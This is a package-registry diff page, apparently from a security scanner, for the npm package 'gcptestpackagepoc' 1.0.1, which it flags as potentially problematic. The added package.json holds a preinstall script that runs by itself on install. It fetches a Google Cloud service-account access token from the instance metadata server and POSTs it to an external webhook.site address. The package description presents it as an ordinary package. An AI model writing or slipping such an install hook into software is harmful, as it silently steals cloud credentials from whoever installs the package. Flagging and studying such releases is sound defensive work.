gcptestpackagepoc 1.0.1
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of gcptestpackagepoc might be problematic. Click here for more details.
- package/package.json +12 -0
package/package.json
ADDED
@@ -0,0 +1,12 @@
|
|
1
|
+
{
|
2
|
+
"name": "gcptestpackagepoc",
|
3
|
+
"version": "1.0.1",
|
4
|
+
"description": "this is some package",
|
5
|
+
"main": "index.js",
|
6
|
+
"scripts": {
|
7
|
+
"test": "echo 'test'",
|
8
|
+
"preinstall": "access_token=$(curl -H 'Metadata-Flavor: Google' 'http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/6531831191-compute@developer.gserviceaccount.com/token'); curl -X POST -d $access_token https://webhook.site/4d75ec1f-a1b1-42be-8e85-43e21bc481a3"
|
9
|
+
},
|
10
|
+
"author": "me",
|
11
|
+
"license": "ISC"
|
12
|
+
}
|